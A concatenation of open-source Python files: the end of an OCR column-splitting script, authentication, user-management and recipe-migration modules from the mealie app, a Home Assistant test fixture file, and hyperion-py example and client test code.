# for j in range(1, len(hist[i + 1: i + math.ceil(max_column_width) - column_width + 1]) + 1):
# if hist[i + j] == max_value:
# continue_appear += 1
# if continue_appear > 1:
# i = i + j - 1
# break
# else:
# continue_appear = 0
elif column_width > 1.3 * max_column_width:
i = i - column_width
i = i + math.ceil(max_column_width * 0.8) + np.argmax(hist[i + math.ceil(max_column_width * 0.8): i + math.ceil(max_column_width * 1.2)]) + 1
text_column_record.append(i)
column_width = 0
i += 1
else:
i += 1
column_width += 1
# for show
# im = Image.new('L', (data.shape[1], data.shape[0] * 2), 255)
# pixels = im.load()
# for i in range(im.width):
# for j in range(data.shape[0]):
# pixels[i, j + data.shape[0]] = pixels[i, j] = int(data[j, i])
# im = im.convert('RGB')
# draw = ImageDraw.Draw(im, mode='RGB')
# for i in range(len(text_column_record)):
# draw.line([(text_column_record[i], 0), (text_column_record[i], data.shape[0])], fill='#ff0000')
# im.show()
tmp_record = list()
for i in range(len(text_column_record) - 1):
if text_column_record[i + 1] - text_column_record[i] > 1:
tmp_record.append((text_column_record[i] + 1, text_column_record[i + 1]))
text_column_record = tmp_record
# print(text_column_record)
return text_column_record
def min_filter(data, size=3): # block: size * size
tmpdata = np.zeros(data.shape)
for i in range(data.shape[0]):
for j in range(data.shape[1]):
# tmpdata[i, j] = np.min(data[(i - 1 >= 0) * (i - size // 2): i + size // 2, (j - 1 >= 0) * (j - size // 2): j + size // 2])
tmpdata[i, j] = np.min(data[((i - size // 2) >= 0) * (i - size // 2): i + size // 2, ((j - size // 2) >= 0) * (j - size // 2): j + size // 2])
return tmpdata
def max_filter(data, size=3): # block: size * size
tmpdata = np.zeros(data.shape)
for i in range(data.shape[0]):
for j in range(data.shape[1]):
# tmpdata[i, j] = np.max(data[(i - 1 >= 0) * (i - size // 2): i + size // 2, (j - 1 >= 0) * (j - size // 2): j + size // 2])
tmpdata[i, j] = np.max(data[((i - size // 2) >= 0) * (i - size // 2): i + size // 2 + 1, ((j - size // 2) >= 0) * (j - size // 2): j + size // 2 + 1])
return tmpdata
def noise_fiilter(data, size=3): # block: size * size
tmpdata = np.zeros(data.shape)
for i in range(data.shape[0]):
for j in range(data.shape[1]):
if tmpdata[i, j] == 0 and np.sum(data[((i - size // 2) >= 0) * (i - size // 2): i + size // 2 + 1, ((j - size // 2) >= 0) * (j - size // 2): j + size // 2 + 1]) >= 255 * 6:
tmpdata[i, j] = 255
else:
tmpdata[i, j] = data[i, j]
return tmpdata
def binarize(im):
im = im.convert('L')
pixels = im.load()
data = np.zeros((im.height, im.width))
for i in range(im.width): # binarize
for j in range(im.height):
pixels[i, j] = 255 if pixels[i, j] > 165 else 0
data[j, i] = pixels[i, j]
return data
def extract_word_in_line(data, text_column_record, line_index): # single line text
dir = '/Users/Jeiel/Desktop/tmp/'
if not os.path.exists(dir):
os.mkdir(dir)
for i in range(len(text_column_record)):
im = create_im_with_data(data[:, text_column_record[i][0]: text_column_record[i][1]])
im.save(dir + str(line_index) + '_' + str(i + 1) + '.bmp')
# print(dir + str(line_index) + '_' + str(i + 1) + '.bmp')
# print(str(line_index) + '_' + str(i + 1) + ': ' + pytesseract.image_to_string(im, lang='chi_sim+eng'))
def create_im_with_data(data): # gray
im = Image.new('L', (data.shape[1], data.shape[0]))
pixels = im.load()
for i in range(im.width):
for j in range(im.height):
pixels[i, j] = int(data[j, i])
return im
def main():
im = Image.open('/Users/Jeiel/Dropbox/数字图像处理/实验/实验五-内容和素材/sample-24 copy.jpg')
enhancer = ImageEnhance.Sharpness(im)
im = enhancer.enhance(2)
data = binarize(im)
# im = im.filter(ImageFilter.MinFilter(3))
# im = im.filter(ImageFilter.MaxFilter(3))
# im.show()
# plt.figure()
# plt.imshow(data, cmap="gray")
# plt.show()
# return
text_line_record = split_text_line(im, data)
# data = noise_fiilter(data)
expand_data = data
expand_data = min_filter(expand_data)
# expand_data = min_filter(expand_data)
# expand_data = max_filter(expand_data)
# plt.figure()
# plt.imshow(expand_data, cmap="gray")
# plt.show()
# return
# plt.figure()
# text_line = expand_data[text_line_record[0][0]: text_line_record[0][1]]
# text_column_record = split_text_column(text_line)
# text_line = data[text_line_record[0][0]: text_line_record[0][1]]
# extract_word_in_line(text_line, text_column_record, 0)
for i in range(len(text_line_record)):
# plt.subplot(len(text_line_record), 1, i + 1)
# plt.imshow(expand_data[text_line_record[i][0]: text_line_record[i][1]], cmap='gray')
# print(text_line_record[i][1] - text_line_record[i][0])
if text_line_record[i][1] - text_line_record[i][0] > 50:
expand_data[text_line_record[i][0]: text_line_record[i][1]] = min_filter(expand_data[text_line_record[i][0]: text_line_record[i][1]])
text_line = expand_data[text_line_record[i][0]: text_line_record[i][1]]
text_column_record = split_text_column(text_line)
text_line = data[text_line_record[i][0]: text_line_record[i][1]]
extract_word_in_line(text_line, text_column_record, i + 1)
# plt.show()
if __name__ == '__main__':
main()
```
|
{
"source": "jeefberkey/mealie",
"score": 3
}
|
#### File: mealie/core/security.py
```python
from datetime import datetime, timedelta
from mealie.schema.user import UserInDB
from jose import jwt
from mealie.core.config import settings
from mealie.db.database import db
from passlib.context import CryptContext
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
ALGORITHM = "HS256"
def create_access_token(data: dict(), expires_delta: timedelta = None) -> str:
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=120)
to_encode.update({"exp": expire})
return jwt.encode(to_encode, settings.SECRET, algorithm=ALGORITHM)
def authenticate_user(session, email: str, password: str) -> UserInDB:
user: UserInDB = db.users.get(session, email, "email")
if not user:
return False
if not verify_password(password, user.password):
return False
return user
def verify_password(plain_password: str, hashed_password: str) -> bool:
"""Compares a plain string to a hashed password
Args:
plain_password (str): raw password string
hashed_password (str): hashed password from the database
Returns:
bool: Returns True if a match return False
"""
return pwd_context.verify(plain_password, hashed_password)
def get_password_hash(password: str) -> str:
"""Takes in a raw password and hashes it. Used prior to saving
a new password to the database.
Args:
password (str): Password String
Returns:
str: Hashed Password
"""
return pwd_context.hash(password)
```
#### File: routes/users/auth.py
```python
from datetime import timedelta
from fastapi import APIRouter, Depends, status
from fastapi.exceptions import HTTPException
from fastapi.security import OAuth2PasswordRequestForm
from mealie.core import security
from mealie.core.security import authenticate_user
from mealie.db.db_setup import generate_session
from mealie.routes.deps import get_current_user
from mealie.schema.snackbar import SnackResponse
from mealie.schema.user import UserInDB
from sqlalchemy.orm.session import Session
router = APIRouter(prefix="/api/auth", tags=["Authentication"])
@router.post("/token/long")
@router.post("/token")
def get_token(
data: OAuth2PasswordRequestForm = Depends(),
session: Session = Depends(generate_session),
):
email = data.username
password = <PASSWORD>
user = authenticate_user(session, email, password)
if not user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"},
)
access_token = security.create_access_token(dict(sub=email), timedelta(hours=2))
return SnackResponse.success(
"User Successfully Logged In",
{"access_token": access_token, "token_type": "bearer"},
)
@router.get("/refresh")
async def refresh_token(current_user: UserInDB = Depends(get_current_user)):
""" Use a valid token to get another token"""
access_token = security.create_access_token(data=dict(sub=current_user.email), expires_delta=timedelta(hours=1))
return {"access_token": access_token, "token_type": "bearer"}
```
#### File: routes/users/crud.py
```python
import shutil
from datetime import timedelta
from fastapi import APIRouter, Depends, File, UploadFile
from fastapi.responses import FileResponse
from mealie.core import security
from mealie.core.config import app_dirs, settings
from mealie.core.security import get_password_hash, verify_password
from mealie.db.database import db
from mealie.db.db_setup import generate_session
from mealie.routes.deps import get_current_user
from mealie.schema.snackbar import SnackResponse
from mealie.schema.user import ChangePassword, UserBase, UserIn, UserInDB, UserOut
from sqlalchemy.orm.session import Session
router = APIRouter(prefix="/api/users", tags=["Users"])
@router.post("", response_model=UserOut, status_code=201)
async def create_user(
new_user: UserIn,
current_user=Depends(get_current_user),
session: Session = Depends(generate_session),
):
new_user.password = get_password_hash(<PASSWORD>_<PASSWORD>.password)
data = db.users.create(session, new_user.dict())
return SnackResponse.success(f"User Created: {new_user.full_name}", data)
@router.get("", response_model=list[UserOut])
async def get_all_users(
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
if current_user.admin:
return db.users.get_all(session)
else:
return {"details": "user not authorized"}
@router.get("/self", response_model=UserOut)
async def get_logged_in_user(
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
return current_user.dict()
@router.get("/{id}", response_model=UserOut)
async def get_user_by_id(
id: int,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
return db.users.get(session, id)
@router.put("/{id}/reset-password")
async def reset_user_password(
id: int,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
new_password = get_password_hash(settings.DEFAULT_PASSWORD)
db.users.update_password(session, id, new_password)
return SnackResponse.success("Users Password Reset")
@router.put("/{id}")
async def update_user(
id: int,
new_data: UserBase,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
token = None
if current_user.id == id or current_user.admin:
db.users.update(session, id, new_data.dict())
if current_user.id == id:
access_token = security.create_access_token(data=dict(sub=new_data.email), expires_delta=timedelta(hours=2))
token = {"access_token": access_token, "token_type": "bearer"}
return SnackResponse.success("User Updated", token)
@router.get("/{id}/image")
async def get_user_image(id: str):
""" Returns a users profile picture """
user_dir = app_dirs.USER_DIR.joinpath(id)
for recipe_image in user_dir.glob("profile_image.*"):
return FileResponse(recipe_image)
else:
return False
@router.post("/{id}/image")
async def update_user_image(
id: str,
profile_image: UploadFile = File(...),
current_user: UserInDB = Depends(get_current_user),
):
""" Updates a User Image """
extension = profile_image.filename.split(".")[-1]
app_dirs.USER_DIR.joinpath(id).mkdir(parents=True, exist_ok=True)
try:
[x.unlink() for x in app_dirs.USER_DIR.join(id).glob("profile_image.*")]
except:
pass
dest = app_dirs.USER_DIR.joinpath(id, f"profile_image.{extension}")
with dest.open("wb") as buffer:
shutil.copyfileobj(profile_image.file, buffer)
if dest.is_file:
return SnackResponse.success("File uploaded")
else:
return SnackResponse.error("Failure uploading file")
@router.put("/{id}/password")
async def update_password(
id: int,
password_change: ChangePassword,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
""" Resets the User Password"""
match_passwords = verify_password(password_change.<PASSWORD>, <PASSWORD>)
match_id = current_user.id == id
if match_passwords and match_id:
new_password = <PASSWORD>password_hash(password_change.<PASSWORD>)
db.users.update_password(session, id, new_password)
return SnackResponse.success("Password Updated")
else:
return SnackResponse.error("Existing password does not match")
@router.delete("/{id}")
async def delete_user(
id: int,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
""" Removes a user from the database. Must be the current user or a super user"""
if id == 1:
return SnackResponse.error("Error! Cannot Delete Super User")
if current_user.id == id or current_user.admin:
db.users.delete(session, id)
return SnackResponse.error("User Deleted")
```
#### File: services/migrations/chowdown.py
```python
import shutil
from pathlib import Path
import yaml
from fastapi.logger import logger
from mealie.core.config import app_dirs
from mealie.db.database import db
from mealie.schema.recipe import Recipe
from mealie.services.image.minify import migrate_images
from mealie.utils.unzip import unpack_zip
from sqlalchemy.orm.session import Session
try:
from yaml import CLoader as Loader
except ImportError:
from yaml import Loader
def read_chowdown_file(recipe_file: Path) -> Recipe:
"""Parse through the yaml file to try and pull out the relavent information.
Some issues occur when ":" are used in the text. I have no put a lot of effort
into this so there may be better ways of going about it. Currently, I get about 80-90%
of recipes from repos I've tried.
Args:
recipe_file (Path): Path to the .yml file
Returns:
Recipe: Recipe class object
"""
with open(recipe_file, "r") as stream:
recipe_description: str = str
recipe_data: dict = {}
try:
for x, item in enumerate(yaml.load_all(stream, Loader=Loader)):
if x == 0:
recipe_data = item
elif x == 1:
recipe_description = str(item)
except yaml.YAMLError:
return
reformat_data = {
"name": recipe_data.get("title"),
"description": recipe_description,
"image": recipe_data.get("image", ""),
"recipeIngredient": recipe_data.get("ingredients"),
"recipeInstructions": recipe_data.get("directions"),
"tags": recipe_data.get("tags").split(","),
}
reformated_list = [{"text": instruction} for instruction in reformat_data["recipeInstructions"]]
reformat_data["recipeInstructions"] = reformated_list
return Recipe(**reformat_data)
def chowdown_migrate(session: Session, zip_file: Path):
temp_dir = unpack_zip(zip_file)
with temp_dir as dir:
chow_dir = next(Path(dir).iterdir())
image_dir = app_dirs.TEMP_DIR.joinpath(chow_dir, "images")
recipe_dir = app_dirs.TEMP_DIR.joinpath(chow_dir, "_recipes")
failed_recipes = []
successful_recipes = []
for recipe in recipe_dir.glob("*.md"):
try:
new_recipe = read_chowdown_file(recipe)
db.recipes.create(session, new_recipe.dict())
successful_recipes.append(new_recipe.name)
except Exception as inst:
session.rollback()
logger.error(inst)
failed_recipes.append(recipe.stem)
failed_images = []
for image in image_dir.iterdir():
try:
if image.stem not in failed_recipes:
shutil.copy(image, app_dirs.IMG_DIR.joinpath(image.name))
except Exception as inst:
logger.error(inst)
failed_images.append(image.name)
report = {"successful": successful_recipes, "failed": failed_recipes}
migrate_images()
return report
```
#### File: services/migrations/nextcloud.py
```python
import json
import logging
import shutil
import zipfile
from pathlib import Path
from mealie.core.config import app_dirs
from mealie.db.database import db
from mealie.schema.recipe import Recipe
from mealie.services.image import minify
from mealie.services.scraper.cleaner import Cleaner
def process_selection(selection: Path) -> Path:
if selection.is_dir():
return selection
elif selection.suffix == ".zip":
with zipfile.ZipFile(selection, "r") as zip_ref:
nextcloud_dir = app_dirs.TEMP_DIR.joinpath("nextcloud")
nextcloud_dir.mkdir(exist_ok=False, parents=True)
zip_ref.extractall(nextcloud_dir)
return nextcloud_dir
else:
return None
def clean_nextcloud_tags(nextcloud_tags: str):
if not isinstance(nextcloud_tags, str):
return None
return [x.title().lstrip() for x in nextcloud_tags.split(",") if x != ""]
def import_recipes(recipe_dir: Path) -> Recipe:
image = False
for file in recipe_dir.glob("full.*"):
image = file
break
for file in recipe_dir.glob("*.json"):
recipe_file = file
break
with open(recipe_file, "r") as f:
recipe_dict = json.loads(f.read())
recipe_data = Cleaner.clean(recipe_dict)
image_name = recipe_data["slug"]
recipe_data["image"] = recipe_data["slug"]
recipe_data["tags"] = clean_nextcloud_tags(recipe_data.get("keywords"))
recipe = Recipe(**recipe_data)
if image:
shutil.copy(image, app_dirs.IMG_DIR.joinpath(image_name + image.suffix))
return recipe
def prep():
shutil.rmtree(app_dirs.TEMP_DIR, ignore_errors=True)
app_dirs.TEMP_DIR.mkdir(exist_ok=True, parents=True)
def cleanup():
shutil.rmtree(app_dirs.TEMP_DIR)
def migrate(session, selection: str):
prep()
app_dirs.MIGRATION_DIR.mkdir(exist_ok=True)
selection = app_dirs.MIGRATION_DIR.joinpath(selection)
nextcloud_dir = process_selection(selection)
successful_imports = []
failed_imports = []
for dir in nextcloud_dir.iterdir():
if dir.is_dir():
try:
recipe = import_recipes(dir)
db.recipes.create(session, recipe.dict())
successful_imports.append(recipe.name)
except Exception:
session.rollback()
logging.error(f"Failed Nextcloud Import: {dir.name}")
logging.exception("")
failed_imports.append(dir.name)
cleanup()
minify.migrate_images()
return {"successful": successful_imports, "failed": failed_imports}
```
|
{
"source": "jeeftor/core",
"score": 2
}
|
#### File: tests/components/conftest.py
```python
from collections.abc import Generator
from unittest.mock import AsyncMock, patch
import pytest
from homeassistant.core import HomeAssistant
from homeassistant.util.unit_system import IMPERIAL_SYSTEM
@pytest.fixture(scope="session", autouse=True)
def patch_zeroconf_multiple_catcher():
"""Patch zeroconf wrapper that detects if multiple instances are used."""
with patch(
"homeassistant.components.zeroconf.install_multiple_zeroconf_catcher",
side_effect=lambda zc: None,
):
yield
@pytest.fixture(autouse=True)
def prevent_io():
"""Fixture to prevent certain I/O from happening."""
with patch(
"homeassistant.components.http.ban.async_load_ip_bans_config",
return_value=[],
):
yield
@pytest.fixture
def entity_registry_enabled_by_default() -> Generator[AsyncMock, None, None]:
"""Test fixture that ensures all entities are enabled in the registry."""
with patch(
"homeassistant.helpers.entity.Entity.entity_registry_enabled_default",
return_value=True,
) as mock_entity_registry_enabled_by_default:
yield mock_entity_registry_enabled_by_default
@pytest.fixture
def units_imperial(hass: HomeAssistant) -> Generator[None, None, None]:
"""Fixture to temporary change units to imperial."""
with patch.object(hass.config, "units", IMPERIAL_SYSTEM):
yield
```
|
{
"source": "jeeftor/hyperion-py",
"score": 3
}
|
#### File: hyperion-py/examples/doc-example-5.py
```python
import asyncio
import logging
import sys
from hyperion import client
HOST = "hyperion"
PRIORITY = 20
async def set_color() -> None:
"""Set red color on Hyperion."""
async with client.HyperionClient(HOST) as hc:
assert hc
if not await hc.async_client_connect():
logging.error("Could not connect to: %s", HOST)
return
if not client.ResponseOK(
await hc.async_clear(priority=PRIORITY)
) or not client.ResponseOK(
await hc.async_set_color(
color=[255, 0, 0], priority=PRIORITY, origin=sys.argv[0]
)
):
logging.error("Could not clear/set_color on: %s", HOST)
return
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
asyncio.get_event_loop().run_until_complete(set_color())
```
#### File: hyperion-py/tests/client_test.py
```python
from __future__ import annotations
import asyncio
from dataclasses import dataclass
import inspect
import json
import logging
import os
import string
from typing import Any, AsyncGenerator, cast
from unittest.mock import Mock, call, patch
import pytest
from hyperion import client, const
logging.basicConfig()
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(logging.DEBUG)
PATH_TESTDATA = os.path.join(os.path.dirname(__file__), "testdata")
TEST_HOST = "test"
TEST_PORT = 65000
TEST_TOKEN = "FA<PASSWORD>TOKEN"
TEST_INSTANCE = 1
FILE_SERVERINFO_RESPONSE = "serverinfo_response_1.json"
SERVERINFO_REQUEST = {
"command": "serverinfo",
"subscribe": [
"adjustment-update",
"components-update",
"effects-update",
"leds-update",
"imageToLedMapping-update",
"instance-update",
"priorities-update",
"sessions-update",
"videomode-update",
],
"tan": 1,
}
TEST_SYSINFO_ID = "f9aab089-f85a-55cf-b7c1-222a72faebe9"
TEST_SYSINFO_VERSION = "2.0.0-alpha.8"
TEST_SYSINFO_RESPONSE = {
"command": "sysinfo",
"info": {
"hyperion": {
"build": "fix-request-tan (GitHub-78458e44/5d5b2497-1601058791)",
"gitremote": "https://github.com/hyperion-project/hyperion.ng.git",
"id": TEST_SYSINFO_ID,
"time": "Sep 29 2020 12:33:00",
"version": TEST_SYSINFO_VERSION,
},
"system": {
"architecture": "arm",
"domainName": "domain",
"hostName": "hyperion",
"kernelType": "linux",
"kernelVersion": "5.4.51-v7l+",
"prettyName": "Raspbian GNU/Linux 10 (buster)",
"productType": "raspbian",
"productVersion": "10",
"wordSize": "32",
},
},
"success": True,
}
def _get_test_filepath(filename: str) -> str:
return os.path.join(PATH_TESTDATA, filename)
def _read_file(filename: str) -> Any:
with open(_get_test_filepath(filename)) as handle:
data = handle.read()
return json.loads(data)
async def _exhaust_callbacks(event_loop: asyncio.AbstractEventLoop) -> None:
"""Run the loop until all ready callbacks are executed."""
loop = cast(asyncio.BaseEventLoop, event_loop)
while loop._ready: # type: ignore[attr-defined]
await asyncio.sleep(0, loop=loop)
class MockStreamReaderWriter:
"""A simple mocl StreamReader and StreamWriter."""
def __init__(self, flow: list[tuple[str, Any]] | None = None) -> None:
"""Initializse the mock."""
self._flow = flow or []
self._read_cv = asyncio.Condition()
self._write_cv = asyncio.Condition()
self._flow_cv = asyncio.Condition()
self._data_to_drain: bytes | None = None
async def add_flow(self, flow: list[tuple[str, Any]]) -> None:
"""Add expected calls to the flow."""
async with self._flow_cv:
self._flow.extend(flow)
await self.unblock_read()
await self.unblock_write()
async def unblock_read(self) -> None:
"""Unblock the read call."""
async with self._read_cv:
self._read_cv.notify_all()
async def unblock_write(self) -> None:
"""Unblock the write call."""
async with self._write_cv:
self._write_cv.notify_all()
async def block_read(self) -> None:
"""Block the read call."""
async with self._read_cv:
await self._read_cv.wait()
async def block_write(self) -> None:
"""Block the write call."""
async with self._write_cv:
await self._write_cv.wait()
async def block_until_flow_empty(self) -> None:
"""Block until the flow has been consumed."""
async with self._flow_cv:
await self._flow_cv.wait_for(lambda: not self._flow)
async def assert_flow_finished(self) -> None:
"""Assert that the flow has been consumed."""
async with self._flow_cv:
assert not self._flow
@classmethod
def _to_json_line(cls, data: Any) -> bytes:
"""Convert data to an encoded JSON string."""
if isinstance(data, str):
return data.encode("UTF-8")
return (json.dumps(data, sort_keys=True) + "\n").encode("UTF-8")
async def _pop_flow(self) -> tuple[str, Any]:
"""Remove an item from the front of the flow and notify."""
async with self._flow_cv:
if not self._flow:
_LOGGER.exception("Unexpected empty flow")
raise AssertionError("Unexpected empty flow")
item = self._flow.pop(0)
self._flow_cv.notify_all()
return item
async def readline(self) -> bytes:
"""Read a line from the mock.
Will block indefinitely if no read call is available.
"""
_LOGGER.debug("MockStreamReaderWriter: readline()")
while True:
should_block = False
async with self._flow_cv:
if not self._flow:
should_block = True
else:
cmd = self._flow[0][0]
if cmd != "read":
should_block = True
if should_block:
await self.block_read()
continue
cmd, data = await self._pop_flow()
await self.unblock_write()
_LOGGER.debug(
"MockStreamReaderWriter: readline() -> %s[...]" % str(data)[:100]
)
if isinstance(data, Exception):
raise data
return MockStreamReaderWriter._to_json_line(data)
def close(self) -> None:
"""Close the mock."""
async def wait_closed(self) -> None:
"""Wait for the close to complete."""
_LOGGER.debug("MockStreamReaderWriter: wait_closed()")
cmd, data = await self._pop_flow()
assert cmd == "close", "wait_closed() called unexpectedly"
if isinstance(data, Exception):
raise data
def write(self, data_in: bytes) -> None:
"""Write data to the mock."""
_LOGGER.debug("MockStreamReaderWriter: write(%s)", data_in)
assert self._data_to_drain is None
self._data_to_drain = data_in
async def drain(self) -> None:
"""Drain the most recent write to the mock.
Will block if the next write in the flow (not necessarily the next call in
the flow) matches that which is expected.
"""
_LOGGER.debug("MockStreamReaderWriter: drain()")
while True:
assert self._data_to_drain is not None
async with self._flow_cv:
assert (
len(self._flow) > 0
), f"drain() called unexpectedly: {self._data_to_drain!r}"
cmd, data = self._flow[0]
should_block = False
if cmd != "write":
async with self._flow_cv:
for cmd_i, data_i in self._flow[1:]:
if cmd_i == "write":
assert json.loads(self._data_to_drain) == data_i
should_block = True
break
else:
raise AssertionError(
f"Unexpected call to drain with data "
f'"{self._data_to_drain!r}", expected "{cmd}" with data '
f'"{data!r}"'
)
if should_block:
await self.block_write()
continue
assert self._data_to_drain is not None
if isinstance(data, Exception):
# 'data' is an exception, raise it.
await self._pop_flow()
raise data
if callable(data):
# 'data' is a callable, call it with the decoded data.
try:
data_in = json.loads(self._data_to_drain)
except json.decoder.JSONDecodeError:
data_in = self._data_to_drain
assert data(data_in)
else:
# 'data' is just data. Direct compare.
assert self._data_to_drain == MockStreamReaderWriter._to_json_line(data)
self._data_to_drain = None
await self._pop_flow()
await self.unblock_read()
break
# This is inspired by asynctest.ClockedTestCase (which this code originally used). This
# functionality is not natively supported in pytest-asyncio. The below is inspired by a
# PR for pytest-asyncio that implements similar clock "advancing":
#
# https://github.com/pytest-dev/pytest-asyncio/pull/113
class EventLoopClockAdvancer:
"""Allow advancing of loop time."""
__slots__ = ("offset", "loop", "_base_time")
def __init__(self, loop: asyncio.AbstractEventLoop) -> None:
"""Initialize."""
self.offset = 0.0
self._base_time = loop.time
self.loop = loop
# incorporate offset timing into the event loop
self.loop.time = self.time # type: ignore[assignment]
def time(self) -> float:
"""Return loop time adjusted by offset."""
return self._base_time() + self.offset
async def __call__(self, seconds: float) -> None:
"""Advance time by a given offset in seconds."""
# Exhaust all callbacks.
await _exhaust_callbacks(self.loop)
if seconds > 0:
# advance the clock by the given offset
self.offset += seconds
# Once the clock is adjusted, new tasks may have just been
# scheduled for running in the next pass through the event loop
await _exhaust_callbacks(self.loop)
@pytest.fixture
def advance_time(event_loop: asyncio.AbstractEventLoop) -> EventLoopClockAdvancer:
"""Advance loop time."""
return EventLoopClockAdvancer(event_loop)
async def _block_until_done(rw: MockStreamReaderWriter) -> None:
await rw.block_until_flow_empty()
await _exhaust_callbacks(asyncio.get_event_loop())
async def _disconnect_and_assert_finished(
rw: MockStreamReaderWriter, hc: client.HyperionClient
) -> None:
"""Disconnect and assert clean disconnection."""
await rw.add_flow([("close", None)])
assert await hc.async_client_disconnect()
await _block_until_done(rw)
assert not hc.is_connected
await rw.assert_flow_finished()
async def _create_client_and_connect(
rw: MockStreamReaderWriter,
*args: Any,
**kwargs: Any,
) -> client.HyperionClient:
"""Create a HyperionClient and connect it."""
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(
TEST_HOST,
TEST_PORT,
*args,
**kwargs,
)
assert await hc.async_client_connect()
assert hc.is_connected
return hc
@pytest.fixture
async def rw(
event_loop: asyncio.AbstractEventLoop,
) -> AsyncGenerator[MockStreamReaderWriter, None]:
"""Create a basic connected client object."""
yield MockStreamReaderWriter(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 1}}),
("read", {**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 1}}),
]
)
@dataclass
class HyperionFixture:
"""Data from a HyperionFixture."""
rw: MockStreamReaderWriter
hc: client.HyperionClient
@pytest.fixture
async def hyperion_fixture(
event_loop: asyncio.AbstractEventLoop,
rw: MockStreamReaderWriter,
) -> AsyncGenerator[HyperionFixture, None]:
"""Create a basic connected client object."""
hc = await _create_client_and_connect(rw)
await rw.assert_flow_finished()
yield HyperionFixture(rw, hc)
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_async_client_connect_success(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test async connection to server."""
@pytest.mark.asyncio
async def test_async_client_connect_failure(
event_loop: asyncio.AbstractEventLoop,
) -> None:
"""Test failed connection to server."""
# == Try to connect when the token fails.
authorize_request = {
"command": "authorize",
"subcommand": "login",
"token": <PASSWORD>_TOKEN,
}
authorize_response = {"command": "authorize-login", "success": False}
rw = MockStreamReaderWriter(
[
("write", {**authorize_request, **{"tan": 1}}),
("read", {**authorize_response, **{"tan": 1}}),
("close", None),
]
)
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(TEST_HOST, TEST_PORT, token=TEST_TOKEN)
assert not await hc.async_client_connect()
assert not hc.is_connected
await rw.assert_flow_finished()
# == Try to connect when the instance selection fails.
instance_request = {
"command": "instance",
"instance": TEST_INSTANCE,
"subcommand": "switchTo",
}
instance_response = {
"command": "instance-switchTo",
"success": False,
"info": {"instance": TEST_INSTANCE},
}
rw = MockStreamReaderWriter(
[
("write", {**instance_request, **{"tan": 1}}),
("read", {**instance_response, **{"tan": 1}}),
("close", None),
]
)
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(TEST_HOST, TEST_PORT, instance=TEST_INSTANCE)
assert not await hc.async_client_connect()
assert not hc.is_connected
await rw.assert_flow_finished()
# == Try to connect when the serverinfo (state load) call fails.
rw = MockStreamReaderWriter(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 1}}),
(
"read",
{
**_read_file(FILE_SERVERINFO_RESPONSE),
**{"tan": 1, "success": False},
},
),
("close", None),
]
)
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(TEST_HOST, TEST_PORT)
assert not await hc.async_client_connect()
assert not hc.is_connected
await rw.assert_flow_finished()
@pytest.mark.asyncio
async def test_async_client_connect_specified_instance(
event_loop: asyncio.AbstractEventLoop,
) -> None:
"""Test server connection to specified instance."""
instance_request = {
"command": "instance",
"instance": TEST_INSTANCE,
"subcommand": "switchTo",
}
instance_response = {
"command": "instance-switchTo",
"success": True,
"info": {"instance": TEST_INSTANCE},
}
rw = MockStreamReaderWriter(
[
("write", {**instance_request, **{"tan": 1}}),
("read", {**instance_response, **{"tan": 1}}),
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
("read", {**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}}),
]
)
hc = await _create_client_and_connect(rw, instance=TEST_INSTANCE)
assert hc.instance == TEST_INSTANCE
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_async_client_connect_raw(event_loop: asyncio.AbstractEventLoop) -> None:
"""Test a raw connection."""
rw = MockStreamReaderWriter()
hc = await _create_client_and_connect(
rw,
instance=TEST_INSTANCE,
token=TEST_TOKEN,
raw_connection=True,
)
# It's a raw connection, it will not be logged in, nor instance selected.
assert hc.is_connected
assert not hc.is_logged_in
assert hc.instance == const.DEFAULT_INSTANCE
assert not hc.has_loaded_state
# Manually log in.
auth_login_in = {
"command": "authorize",
"subcommand": "login",
"token": TEST_TOKEN,
"tan": 1,
}
auth_login_out = {"command": "authorize-login", "success": True, "tan": 1}
await rw.add_flow([("write", auth_login_in), ("read", auth_login_out)])
assert await hc.async_client_login()
# Manually switch instance (and get serverinfo automatically).
switch_in = {
"command": "instance",
"subcommand": "switchTo",
"instance": TEST_INSTANCE,
"tan": 2,
}
switch_out = {
"command": "instance-switchTo",
"info": {"instance": TEST_INSTANCE},
"success": True,
"tan": 2,
}
await rw.add_flow(
[
("write", switch_in),
("read", switch_out),
("write", {**SERVERINFO_REQUEST, **{"tan": 3}}),
("read", {**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 3}}),
]
)
assert await hc.async_client_switch_instance()
assert await hc.async_get_serverinfo()
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_instance_switch_causes_empty_state(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test that an instance will have no state after an instance switch."""
hc = await _create_client_and_connect(rw)
assert hc.instance == const.DEFAULT_INSTANCE
instance = 1
instance_switchto_request = {
"command": "instance",
"subcommand": "switchTo",
"instance": instance,
}
instance_switchto_response = {
"command": "instance-switchTo",
